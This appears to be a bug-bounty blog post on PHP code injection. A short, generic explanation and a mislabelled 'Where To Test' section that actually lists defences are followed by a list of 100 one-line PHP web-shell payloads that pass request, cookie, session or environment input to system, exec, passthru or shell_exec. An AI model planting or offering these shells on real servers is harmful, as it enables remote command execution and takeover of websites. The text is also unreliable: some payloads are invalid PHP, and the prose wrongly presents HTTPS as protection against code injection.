PHP Code Injection | Bug Bounty

What is PHP Code Injection

PHP code injection is a type of attack that allows an attacker to inject malicious code into a vulnerable web application. The code is usually written in PHP and is executed when the application is accessed by a user. This type of attack can be used to gain access to sensitive information, manipulate data, and even gain control over the server.

The most common way for an attacker to inject code into a vulnerable web application is through a vulnerability known as remote file inclusion or RFI. In an RFI attack, the attacker can inject their own malicious code into a vulnerable web application by crafting a malicious URL and sending it to the server. The malicious code is then executed on the server, allowing the attacker to gain access to sensitive data and manipulate the application as they wish.

Other methods of code injection can also be used, such as SQL injection, which allows an attacker to inject malicious SQL commands into a vulnerable web application. This type of attack can be used to gain access to sensitive information and manipulate data.

Regardless of how code injection is performed, it is important to take steps to protect your web application from this type of attack. This can include implementing secure coding practices, such as input validation, and using secure protocols, such as HTTPS. Additionally, it is important to keep your web application up to date with the latest security patches to ensure it is not vulnerable to code injection attacks.

Where To Test PHP Code Injection

1. Validate user input: Web applications should validate user input to ensure that malicious code is not being injected. This can be done by ensuring that input is in the correct format and that it does not contain any unexpected characters.

2. Use secure protocols: Using secure protocols, such as HTTPS, can help to prevent malicious code from being injected into a web application.

3. Keep software up to date: It is important to ensure that your web application is up to date with the latest security patches. This can help to protect against code injection attacks.

4. Implement secure coding practices: Secure coding practices, such as input validation, can help to reduce the risk of code injection attacks.

100 PHP Code Injection Payloads

1. <?php system($_GET['cmd']); ?>
2. <?php exec($_GET['cmd']); ?>
3. <?php passthru($_GET['cmd']); ?>
4. <?php echo shell_exec($_GET['cmd']); ?>
5. <?php system($_POST['cmd']); ?>
6. <?php exec($_POST['cmd']); ?>
7. <?php passthru($_POST['cmd']); ?>
8. <?php echo shell_exec($_POST['cmd']); ?>
9. <?php system($_REQUEST['cmd']); ?>
10. <?php exec($_REQUEST['cmd']); ?>
11. <?php passthru($_REQUEST['cmd']); ?>
12. <?php echo shell_exec($_REQUEST['cmd']); ?>
13. <?php system($_COOKIE['cmd']); ?>
14. <?php exec($_COOKIE['cmd']); ?>
15. <?php passthru($_COOKIE['cmd']); ?>
16. <?php echo shell_exec($_COOKIE['cmd']); ?>
17. <?php system($_SESSION['cmd']); ?>
18. <?php exec($_SESSION['cmd']); ?>
19. <?php passthru($_SESSION['cmd']); ?>
20. <?php echo shell_exec($_SESSION['cmd']); ?>
21. <?php system($_ENV['cmd']); ?>
22. <?php exec($_ENV['cmd']); ?>
23. <?php passthru($_ENV['cmd']); ?>
24. <?php echo shell_exec($_ENV['cmd']); ?>
25. <?php system($_SERVER['cmd']); ?>
26. <?php exec($_SERVER['cmd']); ?>
27. <?php passthru($_SERVER['cmd']); ?>
28. <?php echo shell_exec($_SERVER['cmd']); ?>
29. <?php system("$cmd"); ?>
30. <?php exec("$cmd"); ?>
31. <?php passthru("$cmd"); ?>
32. <?php echo shell_exec("$cmd"); ?>
33. <?php system("$cmd $param"); ?>
34. <?php exec("$cmd $param"); ?>
35. <?php passthru("$cmd $param"); ?>
36. <?php echo shell_exec("$cmd $param"); ?>
37. <?php system("cmd /c $cmd"); ?>
38. <?php exec("cmd /c $cmd"); ?>
39. <?php passthru("cmd /c $cmd"); ?>
40. <?php echo shell_exec("cmd /c $cmd"); ?>
41. <?php system("cmd /c $cmd $param"); ?>
42. <?php exec("cmd /c $cmd $param"); ?>
43. <?php passthru("cmd /c $cmd $param"); ?>
44. <?php echo shell_exec("cmd /c $cmd $param"); ?>
45. <?php system("/bin/bash -c $cmd"); ?>
46. <?php exec("/bin/bash -c $cmd"); ?>
47. <?php passthru("/bin/bash -c $cmd"); ?>
48. <?php echo shell_exec("/bin/bash -c $cmd"); ?>
49. <?php system("/bin/bash -c $cmd $param"); ?>
50. <?php exec("/bin/bash -c $cmd $param"); ?>
51. <?php passthru("/bin/bash -c $cmd $param"); ?>
52. <?php echo shell_exec("/bin/bash -c $cmd $param"); ?>
53. <?php system("/usr/bin/env $cmd"); ?>
54. <?php exec("/usr/bin/env $cmd"); ?>
55. <?php passthru("/usr/bin/env $cmd"); ?>
56. <?php echo shell_exec("/usr/bin/env $cmd"); ?>
57. <?php system("/usr/bin/env $cmd $param"); ?>
58. <?php exec("/usr/bin/env $cmd $param"); ?>
59. <?php passthru("/usr/bin/env $cmd $param"); ?>
60. <?php echo shell_exec("/usr/bin/env $cmd $param"); ?>
61. <?php system("/bin/sh -c $cmd"); ?>
62. <?php exec("/bin/sh -c $cmd"); ?>
63. <?php passthru("/bin/sh -c $cmd"); ?>
64. <?php echo shell_exec("/bin/sh -c $cmd"); ?>
65. <?php system("/bin/sh -c $cmd $param"); ?>
66. <?php exec("/bin/sh -c $cmd $param"); ?>
67. <?php passthru("/bin/sh -c $cmd $param"); ?>
68. <?php echo shell_exec("/bin/sh -c $cmd $param"); ?>
69. <?php system("/usr/bin/sh -c $cmd"); ?>
70. <?php exec("/usr/bin/sh -c $cmd"); ?>
71. <?php passthru("/usr/bin/sh -c $cmd"); ?>
72. <?php echo shell_exec("/usr/bin/sh -c $cmd"); ?>
73. <?php system("/usr/bin/sh -c $cmd $param"); ?>
74. <?php exec("/usr/bin/sh -c $cmd $param"); ?>
75. <?php passthru("/usr/bin/sh -c $cmd $param"); ?>
76. <?php echo shell_exec("/usr/bin/sh -c $cmd $param"); ?>
77. <?php system("/bin/bash -i -c $cmd"); ?>
78. <?php exec("/bin/bash -i -c $cmd"); ?>
79. <?php passthru("/bin/bash -i -c $cmd"); ?>
80. <?php echo shell_exec("/bin/bash -i -c $cmd"); ?>
81. <?php system("/bin/bash -i -c $cmd $param"); ?>
82. <?php exec("/bin/bash -i -c $cmd $param"); ?>
83. <?php passthru("/bin/bash -i -c $cmd $param"); ?>
84. <?php echo shell_exec("/bin/bash -i -c $cmd $param"); ?>
85. <?php system("/usr/bin/bash -i -c $cmd"); ?>
86. <?php exec("/usr/bin/bash -i -c $cmd"); ?>
87. <?php passthru("/usr/bin/bash -i -c $cmd"); ?>
88. <?php echo shell_exec("/usr/bin/bash -i -c $cmd"); ?>
89. <?php system("/usr/bin/bash -i -c $cmd $param"); ?>
90. <?php exec("/usr/bin/bash -i -c $cmd $param"); ?>
91. <?php passthru("/usr/bin/bash -i -c $cmd $param"); ?>
92. <?php echo shell_exec("/usr/bin/bash -i -c $cmd $param"); ?>
93. <?php system($cmd); ?>
94. <?php exec($cmd); ?>
95. <?php passthru($cmd); ?>
96. <?php echo shell_exec($cmd); ?>
97. <?php system($cmd $param); ?>
98. <?php exec($cmd $param); ?>
99. <?php passthru($cmd $param); ?>
100. <?php echo shell_exec($cmd $param); ?>
Tags:

Leave a Reply